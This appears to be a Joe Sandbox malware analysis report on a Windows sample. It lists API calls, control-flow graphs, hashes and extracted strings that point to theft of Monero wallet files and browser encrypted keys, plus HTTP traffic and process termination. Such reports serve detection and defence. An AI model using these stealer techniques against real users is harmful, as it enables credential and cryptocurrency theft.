                                                                                                                                                                                                                                                  control_flow_graph 2430 408807-40888b call 413740 call 406be0 call 41370e call 41398e InternetOpenA StrCmpCA 2439 408891-4088c4 InternetConnectA 2430->2439 2440 4089f4-4089fb 2430->2440 2439->2440 2441 4088ca-4088f3 2439->2441 2442 408a17-408a27 call 41370e 2440->2442 2443 4089fd-408a10 2440->2443 2445 4088f5-4088ff 2441->2445 2446 408906-408919 HttpOpenRequestA 2441->2446 2450 408ab4-408ad6 call 413770 * 3 2442->2450 2443->2442 2445->2446 2448 408a2c-408a2e InternetCloseHandle 2446->2448 2449 40891f-408923 2446->2449 2451 408a34-408a3b 2448->2451 2452 408925-408934 InternetSetOptionA 2449->2452 2453 40893a-408968 HttpSendRequestA HttpQueryInfoA 2449->2453 2455 408a57-408a64 call 41370e 2451->2455 2456 408a3d-408a50 2451->2456 2452->2453 2453->2451 2457 40896e-408979 call 4147cc 2453->2457 2467 408aae 2455->2467 2456->2455 2464 408a66-408a70 2457->2464 2465 40897f-408981 2457->2465 2472 408a72-408a85 2464->2472 2473 408a8c-408a99 call 41370e 2464->2473 2469 408987-408997 2465->2469 2470 408a9b-408aa9 InternetCloseHandle call 413740 2465->2470 2468 408ab1 2467->2468 2468->2450 2474 408998-4089a0 InternetReadFile 2469->2474 2470->2467 2472->2473 2473->2468 2474->2470 2478 4089a6-4089ab 2474->2478 2478->2470 2480 4089b1-4089f2 call 413860 call 4137c0 call 413770 2478->2480 2480->2474
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 0040886C
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00408883
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 004088BC
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00633770,00000000,00000000,00000000,00000000), ref: 00408914
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00408934
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET ref: 00408948
                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00408960
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00408998
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00408A2E
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00408A9C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$Http$CloseHandleOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                                                                  • String ID: GET$p7c
                                                                                                                                                                                                                                                  • API String ID: 1693188093-2983962290
                                                                                                                                                                                                                                                  • Opcode ID: 320e718f7c480985df757210cfd3bb067cc0db8a6482ef72f91870b1b89151d2
                                                                                                                                                                                                                                                  • Instruction ID: cd878151b0f7b65b431806c7ff5f9c38d997bf391b335ef2749d71c6156296e3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 320e718f7c480985df757210cfd3bb067cc0db8a6482ef72f91870b1b89151d2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8371E3B1A002199FDB10EF61DC45BFEBBB9AF84304F00512EF8456B2D1DB789A85CB95
                                                                                                                                                                                                                                                  Function 004014C8 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 246filestringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004014E2
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040157E
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00401581
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 0040170F
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 004017D8
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$CopyDeletelstrcatlstrlenmemset
                                                                                                                                                                                                                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_p$wallet_path
                                                                                                                                                                                                                                                  • API String ID: 828395603-932603126
                                                                                                                                                                                                                                                  • Opcode ID: 30b6d828dc5db3638bc25061e76f592fc5e068d0f52749ab509f5440504ce201
                                                                                                                                                                                                                                                  • Instruction ID: 4dde3ccee4fbd1d333b05f68180df663e1f9c0e41752a6095c3039ca6c7bdac9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30b6d828dc5db3638bc25061e76f592fc5e068d0f52749ab509f5440504ce201
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15912BB5D006489BDF05EFA1CC42AEE7779AF45308F04912EF405671A2DB786A85CB98
                                                                                                                                                                                                                                                  Function 00B0003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2970 b0003c-b00047 2971 b00049 2970->2971 2972 b0004c-b00263 call b00a3f call b00e0f call b00d90 VirtualAlloc 2970->2972 2971->2972 2987 b00265-b00289 call b00a69 2972->2987 2988 b0028b-b00292 2972->2988 2993 b002ce-b003c2 VirtualProtect call b00cce call b00ce7 2987->2993 2990 b002a1-b002b0 2988->2990 2992 b002b2-b002cc 2990->2992 2990->2993 2992->2990 2999 b003d1-b003e0 2993->2999 3000 b003e2-b00437 call b00ce7 2999->3000 3001 b00439-b004b8 VirtualFree 2999->3001 3000->2999 3003 b005f4-b005fe 3001->3003 3004 b004be-b004cd 3001->3004 3007 b00604-b0060d 3003->3007 3008 b0077f-b00789 3003->3008 3006 b004d3-b004dd 3004->3006 3006->3003 3012 b004e3-b00505 LoadLibraryA 3006->3012 3007->3008 3013 b00613-b00637 3007->3013 3010 b007a6-b007b0 3008->3010 3011 b0078b-b007a3 3008->3011 3014 b007b6-b007cb 3010->3014 3015 b0086e-b008be LoadLibraryA 3010->3015 3011->3010 3016 b00517-b00520 3012->3016 3017 b00507-b00515 3012->3017 3018 b0063e-b00648 3013->3018 3019 b007d2-b007d5 3014->3019 3023 b008c7-b008f9 3015->3023 3020 b00526-b00547 3016->3020 3017->3020 3018->3008 3021 b0064e-b0065a 3018->3021 3024 b00824-b00833 3019->3024 3025 b007d7-b007e0 3019->3025 3026 b0054d-b00550 3020->3026 3021->3008 3022 b00660-b0066a 3021->3022 3029 b0067a-b00689 3022->3029 3031 b00902-b0091d 3023->3031 3032 b008fb-b00901 3023->3032 3030 b00839-b0083c 3024->3030 3033 b007e2 3025->3033 3034 b007e4-b00822 3025->3034 3027 b005e0-b005ef 3026->3027 3028 b00556-b0056b 3026->3028 3027->3006 3035 b0056d 3028->3035 3036 b0056f-b0057a 3028->3036 3037 b00750-b0077a 3029->3037 3038 b0068f-b006b2 3029->3038 3030->3015 3039 b0083e-b00847 3030->3039 3032->3031 3033->3024 3034->3019 3035->3027 3040 b0059b-b005bb 3036->3040 3041 b0057c-b00599 3036->3041 3037->3018 3042 b006b4-b006ed 3038->3042 3043 b006ef-b006fc 3038->3043 3044 b00849 3039->3044 3045 b0084b-b0086c 3039->3045 3053 b005bd-b005db 3040->3053 3041->3053 3042->3043 3047 b0074b 3043->3047 3048 b006fe-b00748 3043->3048 3044->3015 3045->3030 3047->3029 3048->3047 3053->3026
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00B0024D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction ID: 293467810f54ff19ff41081e7c88459f5451543b860974326a3aab944536eba1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32526974A11229DFDB64CF58C984BA8BBB1BF09304F1480E9E54DAB391DB30AE95DF14
                                                                                                                                                                                                                                                  Function 00415342 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415358
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 00415362
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 0041536E
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00415392
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004153A1
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004153A8
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 004153B0
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004153BB
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                  • Opcode ID: 32374ddc62da0c9efc6679d4aff576bbbaf21c7cb326f5cef9821f99b737ff79
                                                                                                                                                                                                                                                  • Instruction ID: 1367e15fed5f08099624327341a9f6b83cbc5b8f1d39b42116c2796aecc681f2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32374ddc62da0c9efc6679d4aff576bbbaf21c7cb326f5cef9821f99b737ff79
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4018875201A09AFE3201B60AC8AFFB76ADFF86782F141025F915D6290DFB88C918665
                                                                                                                                                                                                                                                  Function 0040AE6D Relevance: 9.1, APIs: 6, Instructions: 75filememoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(EC8350EC), ref: 0040AF18
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2311089104-0
                                                                                                                                                                                                                                                  • Opcode ID: b98cbdf50d7e701a5be6d0f0972cbf4a774099c09408808f8050ae90e96a3dbc
                                                                                                                                                                                                                                                  • Instruction ID: 1266aaa71881ae481f911ec71e24bbf914394a3ed24a1c6c96427cdecb61913f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b98cbdf50d7e701a5be6d0f0972cbf4a774099c09408808f8050ae90e96a3dbc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B219CB52007019FC720DF65C845A6AB7F6FFC9310F00892AF996872A0DB74E851CB56
                                                                                                                                                                                                                                                  Function 0040B14B Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                    • Part of subcall function 00414B34: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,0040B194,?,?,?,?,?,?,?), ref: 00414B4F
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,-00000010,00643AC3,?,?,?,?), ref: 0040B2A4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpylstrlen
                                                                                                                                                                                                                                                  • String ID: $"encrypted_key":"$DPAP$_key.txt
                                                                                                                                                                                                                                                  • API String ID: 82890309-3678897400
                                                                                                                                                                                                                                                  • Opcode ID: 560c7af5f50cd41879125780b016164bba3ba7196f9a72ca2fff042b5dae2ad0
                                                                                                                                                                                                                                                  • Instruction ID: 200056ac7e48790ee9f9f958e2c71caa17006c645cadd2adf35f82bbd2b34129
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 560c7af5f50cd41879125780b016164bba3ba7196f9a72ca2fff042b5dae2ad0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F5127719403599BDB10DFB5DC49AEE77B6FF05308F08016EE890A7291D7389984CBD9
                                                                                                                                                                                                                                                  Function 00406BAE Relevance: 7.6, APIs: 5, Instructions: 68stringnetworkCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
